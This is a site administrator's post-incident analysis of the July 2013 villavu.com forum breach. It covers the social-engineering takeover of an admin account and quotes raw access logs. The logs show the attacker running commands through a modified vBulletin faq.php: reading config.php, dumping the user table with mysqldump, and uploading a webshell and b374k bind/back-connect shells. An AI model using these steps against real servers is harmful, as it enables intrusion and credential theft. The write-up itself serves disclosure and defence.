Villavu Breach July 06

Warning

This is still work in progress!

Here I will document a quick analysis of the villavu security breach that occured on July the 6th, 2013. I am by no means a forensic expert, but I believe that everybody should know the details.

I can't say I enjoyed the analysis too much, but it was fascinating to see the "evil" side. I'm personally only concerned with the constructive side; this does include security, but not abuse of the aforementioned. This particular breach is not very impressive in the sense that uses standard vBulletin methods (AdminCP; edit files). Furthermore, the main access was gained through social engineering. From a technical point of view, this is not impressive, but there is something to be said for pulling off a successful social engineering attempt.

You will find the details in the next few parts. They are chronological; but not necessarily the order I gathered the information. The information I have had access to are access.log and error.log from lighttpd and the file structure as I found when I heard the server was compromised. I did not have access to all the POST data, unfortunately.

Part 0: Actions taken when we found out

I will briefly cover the course of action we took as soon as we found out. Here is what happened, chronologically:

  • Got a text message from BenLand100 about the server being compromised.
  • Logged into the server and disabled php and all other executable functions of lighttpd within two minutes. This seems to have stopped any further attacks. This happened around 23:16.
  • Started damage control; checking how worse the situation was.
  • Found out the user information was stolen; we took action to mail everyone affected.

Part 1: Social Engineering

The first part is publicly known; but I will write it down for the sake of history. The attacker managed to get hold of the email accounts of one of our administrators (referred to as A); he tried to get an administator (other than me; referred to as B) to reset the password of the administrator under attack. Admin B called A to verify this request; Admin A told him he did not request such a thing. Thus, Admin B mailed all other admins about this attempt at phishing. The annoying part: Wizzup (I) did not recieve a mail.

Later the same attacker tried to get the password of Admin A reset; I had no contact details of admin A other than his email addresses, so I asked him to send me an email from his old email address; being in control of the email of Admin A; he got me to reset his password; and later during the day, the Moderator and Administrator control panel.

Looking back at these events, I should have been more paranoid with handing out this access, of course.

Part 2: Executing code from the AdminCP

Once he got access to the AdminCP, the attacker changed the faq.php file; which can apparently be modified from the Admin CP. Once he had done this; he could execute any command by passing "?faq=welcome&c=COMMAND".

  91.236.116.109 villavu.com BraK [05/Jul/2013:19:49:18 +0200] "GET /forum/admincp/faq.php?do=add HTTP/1.1" 200 3686 "http://villavu.com/forum/admincp/index.php?do=nav" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
  91.236.116.109 villavu.com - [05/Jul/2013:19:49:18 +0200] "GET /favicon.ico HTTP/1.1" 404 345 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
  91.236.116.109 villavu.com - [05/Jul/2013:19:50:18 +0200] "POST /forum/ajax.php HTTP/1.1" 200 133 "http://villavu.com/forum/forum.php?cwd=phpinfo();" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
  91.236.116.109 villavu.com BraK [05/Jul/2013:19:51:50 +0200] "POST /forum/admincp/faq.php?do=insert HTTP/1.1" 200 2062 "http://villavu.com/forum/admincp/faq.php?do=add" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
  91.236.116.109 villavu.com - [05/Jul/2013:19:51:50 +0200] "GET /favicon.ico HTTP/1.1" 404 345 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
  91.236.116.109 villavu.com BraK [05/Jul/2013:19:51:51 +0200] "GET /forum/admincp/faq.php?faq=%20welcome HTTP/1.1" 200 2563 "http://villavu.com/forum/admincp/faq.php?do=insert" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:19:52:02 +0200] "GET /forum/faq.php?faq=welcome&c=phpinfo(); HTTP/1.1" 200 108317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"

Part 3: Getting the user part of the database

Once this was done, getting the database is trivial. You simply open the config.php file and scan for the password; followed by using mysqldump to save a part of the database to a file. After that, you can retrieve the database with cat. Finally, he removes the database dump from "/tmp".

91.236.116.109 villavu.com - [05/Jul/2013:19:52:09 +0200] "GET /forum/faq.php?faq=welcome&c=var_dump(is_writable('.')); HTTP/1.1" 200 47824 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:19:52:19 +0200] "GET /forum/faq.php?faq=welcome&c=system('id'); HTTP/1.1" 200 47857 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:19:52:33 +0200] "GET /forum/faq.php?faq=welcome&c=system('cat%20includes/config.php'); HTTP/1.1" 200 57299 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:19:53:07 +0200] "GET /forum/faq.php?faq=welcome&c=system('mysqldump%20-u%20vBulletin%20-pXXXXXXXXXXX%20vB_SRL%20user%20%3E%20/tmp/dump.sql'); HTTP/1.1" 200 17979 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:19:53:12 +0200] "GET /forum/faq.php?faq=welcome&c=system('ls%20-lah%20/tmp/dump.sql'); HTTP/1.1" 200 47893 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:19:55:02 +0200] "GET /forum/faq.php?faq=welcome&c=system('cat%20/tmp/dump.sql'); HTTP/1.1" 200 50265471 "-" "Wget/1.13.4 (linux-gnu)"
91.236.116.109 villavu.com - [05/Jul/2013:19:55:38 +0200] "GET /forum/faq.php?faq=welcome&c=system('rm%20/tmp/dump.sql'); HTTP/1.1" 200 17900 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"

Worth noting is the mysqldump command; it only dumps the user table. The size of the file can also been seen in the "cat" command: 50265471 bytes This is significantly smaller than our "full" database, which is 3.3GB as of this moment.

Part 4: Various attempts to place backdoors

After succesfully having downloaded the user part of the database, the attacker tried to get more access to the system. He seems to have been successful up to some extent.

First, he tried to find a writable directory and then tries to place a .php file; the first attempts are repeated several times. Eventually, he succeeds to place a php file called "pseudo.php". Followed by another python and perl version of the same program; called "b374k" version 2.2. Programs typically used by script kiddies to make their destructive tasks easier.

91.236.116.109 villavu.com - [05/Jul/2013:19:55:46 +0200] "GET /forum/faq.php?faq=welcome&c=system('find%20.%20-writable'); HTTP/1.1" 200 53364 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:19:57:41 +0200] "POST /forum/faq.php?faq=welcome&c=move_uploaded_file%28%24_FILES%5B%27file%27%5D%5B%27tmp_name%27%5D%2C%27vbsso%2Flogs%2Fpseudo.php%27%29%3B HTTP/1.1" 200 58 "-" "curl/7.26.0"
91.236.116.109 villavu.com - [05/Jul/2013:19:58:14 +0200] "POST /forum/faq.php?faq=welcome&c=move_uploaded_file%28%24_FILES%5B%27file%27%5D%5B%27tmp_name%27%5D%2C%27vbsso%2Flogs%2Fpseudo.php%27%29%3B HTTP/1.1" 200 58 "-" "curl/7.26.0"
91.236.116.109 villavu.com - [05/Jul/2013:19:59:44 +0200] "POST /forum/faq.php?faq=welcome&c=move_uploaded_file%28%24_FILES%5B%27file%27%5D%5B%27tmp_name%27%5D%2C%27vbsso%2Flogs%2Fpseudo.php%27%29%3B HTTP/1.1" 200 58 "-" "curl/7.26.0"
91.236.116.109 villavu.com BraK [05/Jul/2013:20:00:07 +0200] "GET /forum/admincp/attachment.php?do=storage HTTP/1.1" 200 2099 "http://villavu.com/forum/admincp/index.php?do=nav" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:00:07 +0200] "GET /favicon.ico HTTP/1.1" 404 345 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:00:11 +0200] "GET /favicon.ico HTTP/1.1" 404 345 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com BraK [05/Jul/2013:20:00:11 +0200] "GET /forum/modcp/moderate.php?do=attachments HTTP/1.1" 200 1896 "http://villavu.com/forum/admincp/index.php?do=nav" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:00:11 +0200] "GET /favicon.ico HTTP/1.1" 404 345 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com BraK [05/Jul/2013:20:00:12 +0200] "GET /forum/admincp/attachment.php?do=stats HTTP/1.1" 200 3385 "http://villavu.com/forum/admincp/index.php?do=nav" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com BraK [05/Jul/2013:20:00:12 +0200] "GET /forum/admincp/attachmentpermission.php HTTP/1.1" 200 9947 "http://villavu.com/forum/admincp/index.php?do=nav" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:10:04 +0200] "POST /forum/faq.php?faq=welcome&c=move_uploaded_file%28%24_FILES%5B%27file%27%5D%5B%27tmp_name%27%5D%2C%27vbsso%2Flogs%2Fpseudo.php%27%29%3B HTTP/1.1" 200 48701 "-" "curl/7.26.0"
91.236.116.109 villavu.com - [05/Jul/2013:20:10:12 +0200] "GET /forum/vbsso/logs/pseudo.php HTTP/1.1" 200 4666 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"

The pseudo.php is being used for various tasks:

91.236.116.109 villavu.com - [05/Jul/2013:20:10:12 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:10:15 +0200] "POST /forum/vbsso/logs/pseudo.php HTTP/1.1" 302 0 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:10:15 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:10:15 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:10:16 +0200] "GET /forum/vbsso/logs/pseudo.php HTTP/1.1" 200 246507 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:10:16 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:10:25 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:10:25 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/ HTTP/1.1" 200 195414 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:10:25 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:10:25 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:10:29 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/ HTTP/1.1" 200 25792 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com BraK [05/Jul/2013:20:10:51 +0200] "GET /forum/admincp/faq.php?null=0 HTTP/1.1" 200 2576 "http://villavu.com/forum/admincp/index.php?do=nav" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:10:51 +0200] "GET /favicon.ico HTTP/1.1" 404 345 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com BraK [05/Jul/2013:20:10:57 +0200] "GET /forum/admincp/faq.php?do=delete&faq=test HTTP/1.1" 200 2342 "http://villavu.com/forum/admincp/faq.php?null=0" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:10:58 +0200] "GET /favicon.ico HTTP/1.1" 404 345 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com BraK [05/Jul/2013:20:10:59 +0200] "POST /forum/admincp/faq.php?do=kill HTTP/1.1" 200 2062 "http://villavu.com/forum/admincp/faq.php?do=delete&faq=test" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:10:59 +0200] "GET /favicon.ico HTTP/1.1" 404 345 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com BraK [05/Jul/2013:20:11:01 +0200] "GET /forum/admincp/faq.php?faq=welcome HTTP/1.1" 200 2524 "http://villavu.com/forum/admincp/faq.php?do=kill" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"

Followed by more actions on pseudo.php; I cannot find particularly interesting commands here other than exploring the http docroot.

91.236.116.109 villavu.com - [05/Jul/2013:20:11:18 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/includes/ HTTP/1.1" 200 467542 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:11:18 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:11:31 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/includes/&view=/var/www/localhost/htdocs/forum/includes/config.php HTTP/1.1" 200 39120 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/includes/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:11:31 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/includes/&view=/var/www/localhost/htdocs/forum/includes/config.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:11:31 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/includes/&view=/var/www/localhost/htdocs/forum/includes/config.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:11:32 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:11:38 +0200] "GET /forum/vbsso/logs/pseudo.php?rs&d=/var/www/localhost/htdocs/forum/includes/ HTTP/1.1" 200 14093 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/includes/&view=/var/www/localhost/htdocs/forum/includes/config.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:11:38 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?rs&d=/var/www/localhost/htdocs/forum/includes/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"

He then proceeds to upload several more files to "vbsso/logs" (which is a writable directory):

91.236.116.109 villavu.com - [05/Jul/2013:20:45:17 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&delete=/var/www/localhost/htdocs/forum/vbsso/logs/b374k_back.pl" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:17 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&delete=/var/www/localhost/htdocs/forum/vbsso/logs/b374k_back.pl" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:17 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&delete=/var/www/localhost/htdocs/forum/vbsso/logs/b374k_back.pl HTTP/1.1" 200 250962 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:17 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:18 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&delete=/var/www/localhost/htdocs/forum/vbsso/logs/b374k_bind.py" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:19 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&delete=/var/www/localhost/htdocs/forum/vbsso/logs/b374k_bind.py" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:19 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&delete=/var/www/localhost/htdocs/forum/vbsso/logs/b374k_bind.py HTTP/1.1" 200 249276 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&delete=/var/www/localhost/htdocs/forum/vbsso/logs/b374k_back.pl" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:19 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:20 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&delete=/var/www/localhost/htdocs/forum/vbsso/logs/bind.c" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:20 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&delete=/var/www/localhost/htdocs/forum/vbsso/logs/bind.c HTTP/1.1" 200 247699 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&delete=/var/www/localhost/htdocs/forum/vbsso/logs/b374k_bind.py" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:21 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&delete=/var/www/localhost/htdocs/forum/vbsso/logs/bind.c" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:41 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/tmp/ HTTP/1.1" 200 14020 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&delete=/var/www/localhost/htdocs/forum/vbsso/logs/bind.c" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:42 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/tmp/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:42 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/tmp/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:42 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:44 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:44 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:45 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/ HTTP/1.1" 200 247699 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/tmp/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:45 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:47 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&rmdir=/var/www/localhost/htdocs/forum/vbsso/logs/tmp" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:47 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&rmdir=/var/www/localhost/htdocs/forum/vbsso/logs/tmp HTTP/1.1" 200 246507 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:47 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&rmdir=/var/www/localhost/htdocs/forum/vbsso/logs/tmp" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
